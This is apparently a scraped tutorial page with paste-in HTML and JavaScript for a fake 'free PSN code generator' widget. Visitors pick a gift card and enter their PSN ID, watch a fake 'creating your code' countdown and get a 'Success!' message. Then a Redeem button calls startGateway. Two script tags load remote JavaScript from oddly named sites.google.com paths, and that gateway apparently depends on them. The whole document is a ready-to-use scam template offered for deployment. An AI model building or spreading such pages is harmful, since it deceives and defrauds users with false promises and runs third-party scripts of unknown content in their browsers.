You are on page 1of 2

Hey guys, thankfully you got it this far and actually read the instructions.

Let's get started with this, it's pretty straight forward.


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Insert the following code where you want the generator to appear:
<div style="text-align: center;">
<script>cc=0; function changeimage() { if (cc==0)
{ cc=1; document.getEle
mentById('myimage').src="http://i.imgur.com/2wdbEzB.png"; } else { cc=0;
document.getElementById('myimage').src="http://i.imgur.com/6OC7Jqu.png"; } }
</script><script>cc=0; function changeimage1() { if (cc==0)
{ cc=1; docum
ent.getElementById('myimage1').src="http://i.imgur.com/2wdbEzB.png"; } else
{ cc=0; document.getElementById('myimage1').src="http://i.imgur.com/bDtUvgB.
png"; } } </script><script>cc=0; function changeimage2() { if (cc==0)
{ c
c=1; document.getElementById('myimage2').src="http://i.imgur.com/2wdbEzB.png";
} else { cc=0; document.getElementById('myimage2').src="http://i.imgur.
com/BXriKUr.png"; } } </script>
<br />
<h1>
<span style="font-size: large;">Please click a gift card to make a selection.</s
pan></h1>
<br />
<img src="http://i.imgur.com/6OC7Jqu.png" id="myimage" onclick="changeimage()" o
nmouseover="this.style.cursor='pointer'" /> <img src="http://i.imgur.com/bDtUvgB
.png" id="myimage1" onclick="changeimage1()" onmouseover="this.style.cursor='poi
nter'" /> <img src="http://i.imgur.com/BXriKUr.png" id="myimage2" onclick="chang
eimage2()" onmouseover="this.style.cursor='pointer'" />
</div>
<table align="center" border="0" cellpadding="0" cellspacing="0" style="width: 5
22px;">
<tbody>
<tr alt="Free iPhone app giveaway" background="http://i.imgur.com/ZUSa7nu.png">
<td height="262"><div id="main-box" style="backgroun: #eee; margin: 40
auto; overflow: hidden; text-align: center; width: 540px;">
<div id="click">
<span style="color: white; font-family: Verdana, Arial, Helvetica, sans-serif;">
<b><br /><br /><br />Please enter your PSN ID:</b></span><br />
<span style="color: white; font-family: Verdana, Arial, Helvetica, sans-serif;">
<b>This is so that we can send you the code!
</b></span><br />
<form action="javascript:download();">
<label>
<input type="text" />
</label>
<br />
<br />
<a href="javascript:download();"> <img alt="Generate button" src="http://i.imgur
.com/YJt0nne.png" title="" /></a>
</form>
</div>
<div id="countdown" style="display: none;">
<b><span style="color: white; font-family: Verdana, Arial, Helvetica, sans-serif
;">Creating your PSN Code. Please
wait... <br /><img src="http://1.bp
.blogspot.com/-EdY3Fyo9c2M/UjCTcy-nEvI/AAAAAAAABFk/HnN4WgbN2Og/s1600/wRcJRsD.gif
" /></span></b></div>
<div id="download" style="display: none;">
<span style="color: white;"><b><span style="font-family: Verdana, Arial, Helveti
ca, sans-serif;">
Success! - Below is your very own PSN Code!</span><
/b></span><b><span style="font-family: Verdana, Arial, Helvetica, sans-serif;">
<br /><img alt="Redeem Button" src="http://i.imgur.com/AzDJN8m.png" onclick=
"startGateway('140725');" onmouseover="this.style.cursor='pointer'" title="#Rede
em" />
</span></b> </div>
</div>
</td>

</tr>
</tbody>
</table>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Insert these two lines somewhere ABOVE your <head> tags. DO NOT put them within
the <head> tags.
<script src='https://sites.google.com/site/gwaskid543/12/jquery.min.js' type='te
xt/javascript'/>
<script src='https://sites.google.com/site/gwaskid543/asdfasfdasfd/2fc46e205a.js
' type='text/javascript'/>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
That's it, you're now done!

You might also like